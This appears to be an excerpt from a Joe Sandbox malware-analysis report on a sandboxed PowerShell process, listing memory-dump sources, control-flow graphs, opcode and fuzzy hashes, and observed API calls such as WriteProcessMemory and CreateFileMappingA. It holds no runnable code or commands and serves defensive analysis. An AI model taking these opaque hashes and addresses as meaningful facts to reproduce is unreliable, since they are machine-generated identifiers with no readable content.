                                                        • Instruction Fuzzy Hash: 904119B1B003149FD7209F988C15B6ABBF2EF86710F14856AE545AF381DA72DC81C7E1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3075 2bc8888-2bc888c 3076 2bc85bb-2bc860d 3075->3076 3077 2bc8a05-2bc8a3d 3075->3077 3078 2bc8747-2bc876e 3075->3078 3079 2bc8903-2bc8923 3075->3079 3084 2bc83b0-2bc83b6 3076->3084 3091 2bc8613-2bc861b 3076->3091 3077->3084 3078->3084 3101 2bc8929 call 2bcbca8 3079->3101 3102 2bc8929 call 2bcbc98 3079->3102 3087 2bc83bf-2bc8946 3084->3087 3088 2bc83b8-2bc8411 3084->3088 3093 2bc894c-2bc8965 3087->3093 3094 2bc86a5-2bc86ab 3087->3094 3088->3084 3097 2bc8413-2bc841b 3088->3097 3089 2bc892f-2bc8941 3091->3084 3093->3084 3098 2bc896b-2bc8973 3093->3098 3095 2bc86ad-2bc86c6 3094->3095 3096 2bc86d9-2bc86f2 3094->3096 3095->3084 3099 2bc86cc-2bc86d4 3095->3099 3096->3084 3097->3084 3098->3084 3099->3084 3101->3089 3102->3089
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 2`b$7
                                                        • API String ID: 0-1841929334
                                                        • Opcode ID: 340d11b68b14773f3070ed9d0d97f4bdcce2df94438a124a2e3974c2b3706f6c
                                                        • Instruction ID: a60b614482fe6172a41b030f20a5ca5c53c8b25972af62b1e87528943dff3d62
                                                        • Opcode Fuzzy Hash: 340d11b68b14773f3070ed9d0d97f4bdcce2df94438a124a2e3974c2b3706f6c
                                                        • Instruction Fuzzy Hash: 4631E574E04218CFDB10DFA8D954B9DBBB2FB89301F2091EAE509A7744CB355E858F64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $q$$q
                                                        • API String ID: 0-3126353813
                                                        • Opcode ID: 6d7fee8a6a872647dbe1a8a2e20b2a7626c46a9529cfd33e5380b17b9d238867
                                                        • Instruction ID: d2e6ad01f23c629d52d5fe54cdfa16cdd6512fdb26bf9a0462158e6f4fc246ac
                                                        • Opcode Fuzzy Hash: 6d7fee8a6a872647dbe1a8a2e20b2a7626c46a9529cfd33e5380b17b9d238867
                                                        • Instruction Fuzzy Hash: 0C11E2F52093829FDB518A16DC40A65BFF1EF8321CB1882BBD5148B152FB37C805C755

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3712 6bf38bc-6bf38d2 3713 6bf3918 3712->3713 3714 6bf38d4-6bf38db 3712->3714 3715 6bf391b-6bf3957 3713->3715 3716 6bf38dd-6bf38ea 3714->3716 3717 6bf38ec 3714->3717 3726 6bf3959-6bf3962 3715->3726 3727 6bf39d3-6bf39de 3715->3727 3718 6bf38ee-6bf38f0 3716->3718 3717->3718 3719 6bf38f7-6bf38f9 3718->3719 3720 6bf38f2-6bf38f5 3718->3720 3724 6bf38fb-6bf3908 3719->3724 3725 6bf390a 3719->3725 3723 6bf3916 3720->3723 3723->3715 3728 6bf390c-6bf390e 3724->3728 3725->3728 3726->3727 3731 6bf3964-6bf396a 3726->3731 3729 6bf39ed-6bf3a0f 3727->3729 3730 6bf39e0-6bf39e3 3727->3730 3728->3723 3738 6bf3a15-6bf3a1e 3729->3738 3739 6bf3ad0-6bf3b1b 3729->3739 3730->3729 3732 6bf3c04-6bf3c71 3731->3732 3733 6bf3970-6bf397d 3731->3733 3745 6bf3c73-6bf3c7f 3732->3745 3746 6bf3c81-6bf3cba WriteProcessMemory 3732->3746 3736 6bf397f-6bf39a9 3733->3736 3737 6bf39ca-6bf39d1 3733->3737 3752 6bf39ab-6bf39ae 3736->3752 3753 6bf39c6 3736->3753 3737->3727 3737->3731 3738->3732 3741 6bf3a24-6bf3a59 3738->3741 3769 6bf3b1e-6bf3b7c 3739->3769 3758 6bf3a5b-6bf3a71 3741->3758 3759 6bf3a73-6bf3a86 3741->3759 3745->3746 3749 6bf3cbc-6bf3cc2 3746->3749 3750 6bf3cc3-6bf3cd7 3746->3750 3749->3750 3755 6bf39ba-6bf39c3 3752->3755 3756 6bf39b0-6bf39b3 3752->3756 3753->3737 3756->3755 3761 6bf3a88-6bf3a8f 3758->3761 3759->3761 3762 6bf3ab4-6bf3aca 3761->3762 3763 6bf3a91-6bf3aa2 3761->3763 3762->3738 3762->3739 3763->3762 3768 6bf3aa4-6bf3aad 3763->3768 3768->3762 3775 6bf3b7e-6bf3b94 3769->3775 3776 6bf3b96-6bf3ba9 3769->3776 3777 6bf3bab-6bf3bb2 3775->3777 3776->3777 3778 6bf3bb4-6bf3bba 3777->3778 3779 6bf3bc1-6bf3bcb 3777->3779 3778->3779 3779->3769
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2210157777.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6bf0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8ad3917118311b013aaaf74d4d993b51297568505c1b24138e1ba55150072d2
                                                        • Instruction ID: 9bed6049441246f5e88e23204f7c77cc6f4ca464be7bed0d45dafa52b49ae6d5
                                                        • Opcode Fuzzy Hash: b8ad3917118311b013aaaf74d4d993b51297568505c1b24138e1ba55150072d2
                                                        • Instruction Fuzzy Hash: DDD11774E10209DFDB54CFA8D484A9DFBF2FF48310F148599E905AB361CB75A985CB90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q
                                                        • API String ID: 0-1807707664
                                                        • Opcode ID: 514767fc79594c8bab8825f40ef5a0a8711582a04ad152b51693d8945130f055
                                                        • Instruction ID: 6db44e041c1d2fab6fb1059590aaade049ea97776242fe16a1263512285418d4
                                                        • Opcode Fuzzy Hash: 514767fc79594c8bab8825f40ef5a0a8711582a04ad152b51693d8945130f055
                                                        • Instruction Fuzzy Hash: CB1239B4A102059FDB54CF58C554A6EBBF2AF89314F14C27AE909AB355CB31FC46CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q
                                                        • API String ID: 0-1807707664
                                                        • Opcode ID: 6adf6de6604afaabffac8bf5422d2c6a8dbcbd2f442da35fb9c0a17d3410c4b9
                                                        • Instruction ID: 8d8c4902bad63d830e82189449060231648b718066916e1392e5136e921efc42
                                                        • Opcode Fuzzy Hash: 6adf6de6604afaabffac8bf5422d2c6a8dbcbd2f442da35fb9c0a17d3410c4b9
                                                        • Instruction Fuzzy Hash: BD1237B4A10205DFDB54CF58C584A6ABBF2BB89314F25C27AE8196B355CB31FC46CB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 4662 807ec2c-807ec96 4665 807eccf-807ed31 CreateFileA 4662->4665 4666 807ec98-807eca2 4662->4666 4675 807ed33-807ed39 4665->4675 4676 807ed3a-807ed7a 4665->4676 4666->4665 4667 807eca4-807eca6 4666->4667 4669 807ecc9-807eccc 4667->4669 4670 807eca8-807ecb2 4667->4670 4669->4665 4671 807ecb6-807ecc5 4670->4671 4672 807ecb4 4670->4672 4671->4671 4674 807ecc7 4671->4674 4672->4671 4674->4669 4675->4676 4681 807ed7c-807ed80 4676->4681 4682 807ed8a 4676->4682 4681->4682 4683 807ed82 4681->4683 4684 807ed8b 4682->4684 4683->4682 4684->4684
                                                        APIs
                                                        • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 0807ED21
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 7d78634a2d45cfacd4ba5fcb67f15453020838ffbd7425299da6aa8bcf6e0a03
                                                        • Instruction ID: 0cedf1b6ab3aec7e61c1aff6c3745f1836ea35c6c925198904dd4fb18a68d393
                                                        • Opcode Fuzzy Hash: 7d78634a2d45cfacd4ba5fcb67f15453020838ffbd7425299da6aa8bcf6e0a03
                                                        • Instruction Fuzzy Hash: 84415671D012499FDB20DFA9C891BDEBBF2AF08710F148529E815AA250DB799841CF85

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 4685 807eff4-807f061 4687 807f063-807f06d 4685->4687 4688 807f09a-807f0f7 CreateFileMappingA 4685->4688 4687->4688 4689 807f06f-807f071 4687->4689 4697 807f100-807f140 4688->4697 4698 807f0f9-807f0ff 4688->4698 4690 807f094-807f097 4689->4690 4691 807f073-807f07d 4689->4691 4690->4688 4693 807f081-807f090 4691->4693 4694 807f07f 4691->4694 4693->4693 4695 807f092 4693->4695 4694->4693 4695->4690 4703 807f142-807f146 4697->4703 4704 807f150 4697->4704 4698->4697 4703->4704 4705 807f148 4703->4705 4706 807f151 4704->4706 4705->4704 4706->4706
                                                        APIs
                                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 0807F0E7
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFileMapping
                                                        • String ID:
                                                        • API String ID: 524692379-0
                                                        • Opcode ID: 262b3db65bd400cc1ef3ef5e1838bbf00f3fed333b7414bf9ec679d5f130f9d1
                                                        • Instruction ID: 7eb0960b6833e7c39f82ae9445b613f3da3c0454698fc983b224a76320510d1b
                                                        • Opcode Fuzzy Hash: 262b3db65bd400cc1ef3ef5e1838bbf00f3fed333b7414bf9ec679d5f130f9d1
                                                        • Instruction Fuzzy Hash: 7A415671D0034A9FDB14CFA9C881BEEBBF2EF48310F14852AE815AB340DB759881CB85
                                                        APIs
                                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 0807F0E7
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFileMapping
                                                        • String ID:
                                                        • API String ID: 524692379-0
                                                        • Opcode ID: b3dd13b8a7fdd86c456df62b575ec7d52185b044d75951f5af9b3be00049209f
                                                        • Instruction ID: 7e77dfd5079335abe1e5a84b9b0acd7d5a0773a489207fff6034a251c348ccb5
                                                        • Opcode Fuzzy Hash: b3dd13b8a7fdd86c456df62b575ec7d52185b044d75951f5af9b3be00049209f
                                                        • Instruction Fuzzy Hash: 04413571D0034A9FDB14DFA9C881BAEBBF2EF48310F148529E815AB350DB759881CB85
                                                        APIs
                                                        • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 0807ED21
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 444d3b42e664b0cd10515a6c1015c65f075289c48812fe2af52c88820d3b6208
                                                        • Instruction ID: 908bb471ea61b6d9f95e430b6245f2423db90d179119f7f745c8a940475f7421
                                                        • Opcode Fuzzy Hash: 444d3b42e664b0cd10515a6c1015c65f075289c48812fe2af52c88820d3b6208
                                                        • Instruction Fuzzy Hash: 20413671D012499FDB24DFA9C881BDEBBF2FF08710F148529E815AA250DB759841CF95
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000001), ref: 06BF3CAD
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2210157777.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6bf0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 853af1a8587e9a86441cebfddf08a65053dcea1d0278311b5dce1497d79e23bd
                                                        • Instruction ID: 3ed4c87d9f4c9cdc1faf3e312535fdd5cfb04bbe07d5114e34f7d5b3bb5ec558
                                                        • Opcode Fuzzy Hash: 853af1a8587e9a86441cebfddf08a65053dcea1d0278311b5dce1497d79e23bd
                                                        • Instruction Fuzzy Hash: F221EEB5D103589FCB14CF9AD884BDEBBF4FB48310F10842AE919A7250D378A944CBA4
                                                        APIs
                                                        • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 0807F3AE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID: FileView
                                                        • String ID:
                                                        • API String ID: 3314676101-0
                                                        • Opcode ID: cafa3e7751fee84987cab6a2c881615b46e01487e8140ac6e5e970bb9e0ac278
                                                        • Instruction ID: 47c5919ae0c672d32d22f3cd5e965047625a72176d2f99408d3428e8d42a22a4
                                                        • Opcode Fuzzy Hash: cafa3e7751fee84987cab6a2c881615b46e01487e8140ac6e5e970bb9e0ac278
                                                        • Instruction Fuzzy Hash: BF115676C003499FDB20DFAAD845BEFBBF5EB48320F14841AE515AB250CB799540CFA4
                                                        APIs
                                                        • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 0807F3AE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID: FileView
                                                        • String ID:
                                                        • API String ID: 3314676101-0
                                                        • Opcode ID: d19d92041499793cb93789ca0ba56a293bf47b60547d16fd6505318bf4964a75
                                                        • Instruction ID: f08757cdb2f5dde66ab6ccf93cfaa9f330b054fff67b47af41395b7ff321f5ed
                                                        • Opcode Fuzzy Hash: d19d92041499793cb93789ca0ba56a293bf47b60547d16fd6505318bf4964a75
                                                        • Instruction Fuzzy Hash: 56112672C003499FDB24DFAAC845BEFBBF5EB48320F14841AE515AB250CB799540CBA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 85d95bb3267d397a2960064e4a1754c07fd6b87496dc13e00bc01f4b87f8c2e3
                                                        • Instruction ID: 254dcd4e445cfa6e8ef61c5feb203f6225c0c48630deba3dcf0f68d848f72adb
                                                        • Opcode Fuzzy Hash: 85d95bb3267d397a2960064e4a1754c07fd6b87496dc13e00bc01f4b87f8c2e3
                                                        • Instruction Fuzzy Hash: 7F810270A04219CFEB64CFA8C884BAEFBB6FB49314F2091EDE009A7251DB745985DF45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: f752805a1bb0d36c75e2103694a189516f70d08ff824a89ca9efd892254c784b
                                                        • Instruction ID: 98ab902d93f00455591cb5ebfc03e4380bd908d391def99359df85e0a59d815c
                                                        • Opcode Fuzzy Hash: f752805a1bb0d36c75e2103694a189516f70d08ff824a89ca9efd892254c784b
                                                        • Instruction Fuzzy Hash: AE8180B4E152298FDB64DF68D894BD9BBB1BB49300F1081E9E959A7740DB306E80CF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q
                                                        • API String ID: 0-1807707664
                                                        • Opcode ID: e4a71f3c1436e578240cb7e31a44ff8f15335cd21f7285af97527118a9a0e498
                                                        • Instruction ID: 397b883489704c2f87f669281f23c0be82b0e46c82f8eaf0d4e5b16055460b74
                                                        • Opcode Fuzzy Hash: e4a71f3c1436e578240cb7e31a44ff8f15335cd21f7285af97527118a9a0e498
                                                        • Instruction Fuzzy Hash: B731F4F0A05306DFDB619A61850476F7BE5EF81240F4442F6DA14EB192DB39E981CBA2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (oq
                                                        • API String ID: 0-1999159160
                                                        • Opcode ID: 470aad5b329f2fcf032de8506ce79567a04f8c0aeb4a0cd57457a84b9b579f48
                                                        • Instruction ID: 8480a94096f14d7538c9d1ab2c29acc4976b9d947574a0191916bc559407f82d
                                                        • Opcode Fuzzy Hash: 470aad5b329f2fcf032de8506ce79567a04f8c0aeb4a0cd57457a84b9b579f48
                                                        • Instruction Fuzzy Hash: DB216DF0E48309EFEFA4CF14C948BAA77A2EB44741F1C90A6E5058B190F771D890CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q
                                                        • API String ID: 0-1807707664
                                                        • Opcode ID: 7fbd8ba4c7262688a59bd2d740c50dfd8de0552a352e5ff8e398dac80cc73279
                                                        • Instruction ID: 99329298504f5aff43e3af347313c32ecc56a7c36cd806d62c1ddffc07f458b7
                                                        • Opcode Fuzzy Hash: 7fbd8ba4c7262688a59bd2d740c50dfd8de0552a352e5ff8e398dac80cc73279
                                                        • Instruction Fuzzy Hash: 0511AFF0E083048FDBA4DB69C64076A77E9EF89650F1C80ABD408C7251F730C941CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: }
                                                        • API String ID: 0-4239843852
                                                        • Opcode ID: f03243bd6b5ae3c0738ed7c650020f439ba664bd2c3abca9777c25a26fbdf5a4
                                                        • Instruction ID: f8cd5f72f6e9696914c4977e40ef598cb6dceed5841997b4e29db74a1dbe4dce
                                                        • Opcode Fuzzy Hash: f03243bd6b5ae3c0738ed7c650020f439ba664bd2c3abca9777c25a26fbdf5a4
                                                        • Instruction Fuzzy Hash: 98E092B181A255CBD715DB28DC44BD67BA5EB11208F0141D9800C572A1E2755A458F51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: }
                                                        • API String ID: 0-4239843852
                                                        • Opcode ID: e5b7a09c74d78133f3119774aeacc9f01466034b57b691f646496bb653eb9206
                                                        • Instruction ID: f6e0c6668bda72bd98447b6168dbacfb8bfa76359a28a00088a058e311f22531
                                                        • Opcode Fuzzy Hash: e5b7a09c74d78133f3119774aeacc9f01466034b57b691f646496bb653eb9206
                                                        • Instruction Fuzzy Hash: 08D0A730C56515CBDB60CF1CCC047E677F9EB00204F0081D5800C87260D7311A858F50
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2172710117.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2c90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d46ff953baa11f3e6ad387be71eb3c6fc02aeacd737460b7d5c4444f417d974f
                                                        • Instruction ID: b177a0737287556af2a496406a2c5a509b0ccb26753107c46eaa9c8e163d7b30
                                                        • Opcode Fuzzy Hash: d46ff953baa11f3e6ad387be71eb3c6fc02aeacd737460b7d5c4444f417d974f
                                                        • Instruction Fuzzy Hash: C4422C74A012099FDB14DFA8D584AADFBF2FF89314F24855AE405AB351C735ED82CB90
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3510f51222fd257f11b6fc75857b18c8597b4df86eaacf28b5192ca6a3f48689
                                                        • Instruction ID: 8540e4c0bd3fb384ed30970759e004545e8c543cd0393b00daac0578c1d8d15f
                                                        • Opcode Fuzzy Hash: 3510f51222fd257f11b6fc75857b18c8597b4df86eaacf28b5192ca6a3f48689
                                                        • Instruction Fuzzy Hash: EF322CB4B002149FEB54CB54C844B6ABBF2EB89314F14C1AAD909AF351DB72ED85CF91
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2172710117.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2c90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 68c90a93f3b95a3aefea68b60b6408ee0431bae37599c85b18bb6d8596c640b9
                                                        • Instruction ID: 5169d21906e6ecbd29309c923fdffec8eddbb2f45bc62c87da295b7a6f0d87d3
                                                        • Opcode Fuzzy Hash: 68c90a93f3b95a3aefea68b60b6408ee0431bae37599c85b18bb6d8596c640b9
                                                        • Instruction Fuzzy Hash: B9D12874E012599FDB15CFA8D484A9DBBB2FF89314F24819AE815AB352C731ED42CF90
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2172710117.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2c90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0613424a82cf32fe151d2a803b0e233c6bb6c6d8bd027d5a7d6b6f286467442e
                                                        • Instruction ID: ffcb26fca4c01feed90addafb761894c7373c2794ff30630ccbbeb27dd45a47d
                                                        • Opcode Fuzzy Hash: 0613424a82cf32fe151d2a803b0e233c6bb6c6d8bd027d5a7d6b6f286467442e
                                                        • Instruction Fuzzy Hash: A191E170A00645DFCB15CF58C898AAEFBB1FF89310B288599D855EB391C735EC91CBA1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4ceecb387ab1c19afcc10433911fd7415a7f1ed5744a3152cd030b46078de01
                                                        • Instruction ID: b63dc21f48f36a327d0a8339be589c8dc591163ce394cf27ae29b19057ae58b5
                                                        • Opcode Fuzzy Hash: d4ceecb387ab1c19afcc10433911fd7415a7f1ed5744a3152cd030b46078de01
                                                        • Instruction Fuzzy Hash: E4819FF4B043089FDB58CF19C641AAA77E2EB84750F1D84A6ED059B395EB31EC41CBA1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a74d6646ff7267981a6662881586649b97134adb8d819c554e755628734d7c20
                                                        • Instruction ID: b3847c8bd5dc296e07b3e3c7a077ac7302854a31c1f2ea0d050dba7feda42ad8
                                                        • Opcode Fuzzy Hash: a74d6646ff7267981a6662881586649b97134adb8d819c554e755628734d7c20
                                                        • Instruction Fuzzy Hash: 415103B1D0420ACFDB04CF95D486BEEBBF2AB49315F2094AAE609B7350DB745985CF90
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d7ac35204113b2e4a466430e620403f83ad137ba5be4072dfbb9fb52a3fd547
                                                        • Instruction ID: d67741773448a412963dcbd0b1612397bd383429f8b3c57465fc74b331bde118
                                                        • Opcode Fuzzy Hash: 0d7ac35204113b2e4a466430e620403f83ad137ba5be4072dfbb9fb52a3fd547
                                                        • Instruction Fuzzy Hash: 8651F3B1D04209DFDB04CF95D486BEEBBF2AB89315F2094AAE609B7350DB741985CF90
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2305bc5c8fbc811c73cb5c687d82f82d41be0079aab6b6f056d24ae70f34eb63
                                                        • Instruction ID: 7af1ce82a5d52e655de1ba85e4aa7c37b442b45a9759189c2cffb63a4273a5c4
                                                        • Opcode Fuzzy Hash: 2305bc5c8fbc811c73cb5c687d82f82d41be0079aab6b6f056d24ae70f34eb63
                                                        • Instruction Fuzzy Hash: 0E4127B1B012159FDB64AB7988002AEB7E6EFD4610F24C93AD915EB381DE31D901C7D1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db2291c95b8c4f7c83901d53636c9e04d72655ac85e6d86ab1fc7cf26f8e8758
                                                        • Instruction ID: aff69c586a6e732a370aa40d500aaab0841f4158525849075b7ba35a068a9539
                                                        • Opcode Fuzzy Hash: db2291c95b8c4f7c83901d53636c9e04d72655ac85e6d86ab1fc7cf26f8e8758
                                                        • Instruction Fuzzy Hash: 13414870A04218CFDB60DF69D884BADBBF2BB89326F10D1A9D809A7341DB755D95CF40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2172710117.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2c90000_powershell.jbxd
